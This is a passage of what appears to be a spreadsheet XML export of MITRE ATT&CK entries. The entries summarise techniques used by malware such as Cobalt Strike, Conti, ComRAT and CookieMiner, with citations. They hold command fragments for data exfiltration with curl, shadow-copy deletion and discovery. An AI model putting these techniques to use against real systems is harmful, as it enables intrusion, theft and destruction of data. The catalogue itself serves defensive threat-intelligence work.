    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can query &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office\&lt;Excel Version&gt;\Excel\Security\AccessVBOM\&lt;/code&gt;  to determine if the security setting for restricting default programmatic access is enabled.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s &lt;code&gt;execute-assembly&lt;/code&gt; command can run a .NET executable within the memory of a sacrificial process by loading the CLR.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.(Citation: cobaltstrike manual)(Citation: Cybereason Bumblebee August 2022)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use `rundll32.exe` to load DLL from the command line.(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Window admin shares (C$ and ADMIN$) for lateral movement.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can SSH to a remote service.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s Beacon payload is capable of capturing screenshots.(Citation: cobaltstrike manual)(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can recover hashed passwords.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use [PsExec](https://attack.mitre.org/software/S0029) to execute a payload on a remote host. It can also use Service Control Manager to start new services.(Citation: cobaltstrike manual)(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>The [Cobalt Strike](https://attack.mitre.org/software/S0154) System Profiler can discover applications through the browser and identify the version of Java the target has.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Base64, URL-safe Base64, or NetBIOS encoding in its C2 traffic.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use &lt;code&gt;sudo&lt;/code&gt; to run a command.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can determine the NetBios name and  the IP addresses of targets machines including domain controllers.(Citation: Cyberreason Anchor December 2019)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can produce a sessions report from compromised hosts.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can enumerate services on compromised hosts.(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can timestomp any files or payloads placed on a target machine to help them blend in.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can steal access tokens from exiting processes.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use VBA to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) uses a command-line interface to interact with systems.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use WMI to deliver a payload to a remote host.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use &lt;code&gt;WinRM&lt;/code&gt; to execute a payload on a remote host.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can install a new service.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform voice recording on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) uses DNS for C2.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform keylogging on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) creates an autostart Registry key to ensure persistence.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform screen capture.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) obfuscates communications with the C2 server using Base64 encoding.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to access the webcam on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) can launch a remote command shell interface for executing commands.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) decodes the initially-downloaded hidden encoded file using OpenSSL.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) downloads the EggShell mach-o binary using curl, which does not set the quarantine flag.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) downloads the following hidden files to evade detection and maintain persistence: /private/tmp/.info.enc, /private/tmp/.info.py, /private/tmp/.server.sh, ~/Library/LaunchAgents/.espl.plist, ~/Library/Containers/.[random string]/[random string].(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) executes a Python script to download its second stage.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[CoinTicker](https://attack.mitre.org/software/S0369) creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.(Citation: CoinTicker 2019)	</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) initially downloads a hidden encoded file.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) executes a bash script to establish a reverse shell.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) can use SSL/TLS encryption for its HTTP-based C2 channel. [ComRAT](https://attack.mitre.org/software/S0126) has used public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has the ability to use the Gmail web UI to receive commands and exfiltrate information.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location &lt;code&gt;HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32&lt;/code&gt;.(Citation: NorthSec 2015 GData Uroburos Tools)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used unique per machine passwords to decrypt the orchestrator payload and a hardcoded XOR key to decrypt its communications module. [ComRAT](https://attack.mitre.org/software/S0126) has also used a unique password to decrypt the file used for its hidden file system.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has injected its orchestrator DLL into explorer.exe. [ComRAT](https://attack.mitre.org/software/S0126) has also injected its communications module into the victim's default browser to make C2 connections appear less suspicious as all network connections will be initiated by the browser process.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has embedded a XOR encrypted communications module inside the orchestrator module.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can use email attachments for command and control.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used a task name associated with Windows SQM Consolidator.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has encrypted and stored its orchestrator code in the Registry as well as a PowerShell script into the WsqmCons Registry key.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can load a PE file from memory or the file system and execute it with &lt;code&gt;CreateProcessW&lt;/code&gt;.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has used encryption and base64 to obfuscate its orchestrator code in the Registry. [ComRAT](https://attack.mitre.org/software/S0126) has encrypted its virtual file system using AES-256 in XTS mode and has encoded PowerShell scripts.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used PowerShell to load itself every time a user logs in to the system. [ComRAT](https://attack.mitre.org/software/S0126) can execute PowerShell scripts loaded into memory or from the file system.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can check the default browser by querying &lt;code&gt;HKCR\http\shell\open\command&lt;/code&gt;.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used a scheduled task to launch its PowerShell loader.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has been programmed to sleep outside local business hours (9 to 5, Monday to Friday).(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can check the victim's default browser to determine which process to inject its communications module into.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has checked the victim system's date and time to perform tasks during business hours (9 to 5, Monday to Friday).(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used HTTP requests for command and control.(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used &lt;code&gt;cmd.exe&lt;/code&gt; to execute commands.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes a batch script to store discovery information in %TEMP%\info.dat and then uploads the temporarily file to the remote C2 server.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses the &lt;code&gt;net user&lt;/code&gt; command.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses RC4 and Base64 to obfuscate strings.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses the &lt;code&gt;tasklist&lt;/code&gt; to view running processes on the victim’s machine.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) achieves persistence by adding a shortcut of itself to the startup path in the Registry.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) runs the &lt;code&gt;net view&lt;/code&gt; command</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses Rundll32 to load a malicious DLL.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) attempts to detect several anti-virus products.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) establishes persistence via a .lnk file in the victim’s startup path.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) encrypts command and control communications with RC4.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) collects the hostname of the victim machine.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses &lt;code&gt;ipconfig /all&lt;/code&gt; and &lt;code&gt;route PRINT&lt;/code&gt; to identify network adapter and interface information.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes the &lt;code&gt;netstat -ano&lt;/code&gt; command.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) runs the command: &lt;code&gt;net start &gt;&gt; %TEMP%\info.dat&lt;/code&gt; on a victim.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes VBS scripts.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses HTTP for C2 communication.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes BAT scripts.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) terminates various services related to system security and Windows.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) has used a DGA that seeds with the current UTC victim system date to generate domains.(Citation: SANS Conficker)(Citation: Trend Micro Conficker)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) exploited the MS08-067 Windows vulnerability for remote code execution through a crafted RPC request.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) downloads an HTTP server to the infected machine.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) resets system restore points and deletes backup files.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) adds keys to the Registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services&lt;/code&gt; and various other Registry locations.(Citation: SANS Conficker)(Citation: Trend Micro Conficker)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) scans for other machines to infect.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) has obfuscated its code to prevent its removal from host machines.(Citation: Trend Micro Conficker)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) adds Registry Run keys to establish persistence.(Citation: Trend Micro Conficker)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) variants used the Windows AUTORUN feature to spread through USB propagation.(Citation: SANS Conficker)(Citation: Trend Micro Conficker)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) variants spread through NetBIOS share propagation.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) uses the current UTC victim system date for domain generation and connects to time servers to determine the current date.(Citation: SANS Conficker)(Citation: Trend Micro Conficker)</t>
  </si>
  <si>
    <t>[Conficker](https://attack.mitre.org/software/S0608) copies itself into the &lt;code&gt;%systemroot%\system32&lt;/code&gt; directory and registers as a service.(Citation: SANS Conficker)</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) can be used to execute PowerShell commands on target machines.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) can take screenshots on remote hosts.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) can record video on remote hosts.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can use &lt;code&gt;CreateIoCompletionPort()&lt;/code&gt;, &lt;code&gt;PostQueuedCompletionStatus()&lt;/code&gt;, and &lt;code&gt;GetQueuedCompletionPort()&lt;/code&gt; to rapidly encrypt files, excluding those with the extensions of .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RAS-4096 public encryption key that is unique for each victim. [Conti](https://attack.mitre.org/software/S0575) can use “Windows Restart Manager” to ensure files are unlocked and open for encryption.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)(Citation: CrowdStrike Wizard Spider October 2020)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) has decrypted its payload using a hardcoded AES-256 key.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) has loaded an encrypted DLL into memory and then executes it.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can discover files on a local system.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can delete Windows Volume Shadow Copies using &lt;code&gt;vssadmin&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Conti](https://attack.mitre.org/software/S0575) has used API calls during execution.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020) </t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can enumerate remote open SMB network shares using &lt;code&gt;NetShareEnum()&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls.(Citation: CarbonBlack Conti July 2020)(Citation: Cybereason Conti Jan 2021)(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can enumerate through all open processes to search for any that have the string “sql” in their process name.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">
[Conti](https://attack.mitre.org/software/S0575) has the ability to discover hosts on a target network.(Citation: CrowdStrike Wizard Spider October 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of &lt;code&gt;net stop&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Conti](https://attack.mitre.org/software/S0575) can retrieve the ARP cache from the local system by using the &lt;code&gt;GetIpNetTable()&lt;/code&gt; API call and check to ensure IP addresses it connects to are for local, non-Internet, systems.(Citation: CarbonBlack Conti July 2020) </t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can enumerate routine network connections from a compromised host.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Conti](https://attack.mitre.org/software/S0575) can spread itself by infecting other remote machines via network shared drives.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020) </t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can utilize command line options to allow an attacker control over how it scans and encrypts files.(Citation: CarbonBlack Conti July 2020)(Citation: DFIR Conti Bazar Nov 2021)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) can steal saved usernames and passwords in Chrome as well as credit card credentials.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has retrieved iPhone text messages from iTunes phone backup files.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used Google Chrome's decryption and extraction operations.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has checked for the presence of "Little Snitch", macOS network monitoring and application firewall software, stopping and exiting if it is found.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used the &lt;code&gt;curl --upload-file&lt;/code&gt; command to exfiltrate data over HTTP.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has looked for files in the user's home directory with "wallet" in their name using &lt;code&gt;find&lt;/code&gt;.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) can download additional scripts from a web server.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[CookieMiner](https://attack.mitre.org/software/S0492) has used base64 encoding to obfuscate scripts on the system.(Citation: Unit42 CookieMiner Jan 2019) </t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used python scripts on the user’s system, as well as the Python variant of the [Empire](https://attack.mitre.org/software/S0363) agent, EmPyre.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has loaded coinmining software onto systems to mine for Koto cryptocurrency. (Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) can steal Google Chrome and Apple Safari browser cookies from the victim’s machine. (Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used a Unix shell script to run a series of commands targeting macOS.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) exfiltrates collected files automatically over FTP to remote servers.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) copies and exfiltrates the clipboard contents every 30 seconds.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects user credentials, including passwords, for various programs including Web browsers.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from local hard drives with file extensions that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from network shared drives with file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) steals user files from removable media with file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) searches attached and mounted drives for file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) uses a keylogger.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects LSA secrets.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) uses scheduled tasks typically named "Watchmon Service" for persistence.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) takes periodic screenshots and exfiltrates them.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) collects Windows account hashes.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) contains a custom version of the RC4 algorithm that includes a programming error.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) can use HTTP or HTTPS for command and control to hard-coded C2 servers.(Citation: F-Secure The Dukes)(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CosmicDuke](https://attack.mitre.org/software/S0050) uses Windows services typically named "javamtsup" for persistence.(Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>[CostaBricks](https://attack.mitre.org/software/S0614) has added the entire unobfuscated code of the legitimate open source application Blink to its code.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[CostaBricks](https://attack.mitre.org/software/S0614) has the ability to use bytecode to decrypt embedded payloads.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t>[CostaBricks](https://attack.mitre.org/software/S0614) has been used to load [SombRAT](https://attack.mitre.org/software/S0615) onto a compromised host.(Citation: BlackBerry CostaRicto November 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[CostaBricks](https://attack.mitre.org/software/S0614) has used a number of API calls, including `VirtualAlloc`, `VirtualFree`, `LoadLibraryA`, `GetProcAddress`, and `ExitProcess`.(Citation: BlackBerry CostaRicto November 2020) </t>
  </si>
  <si>
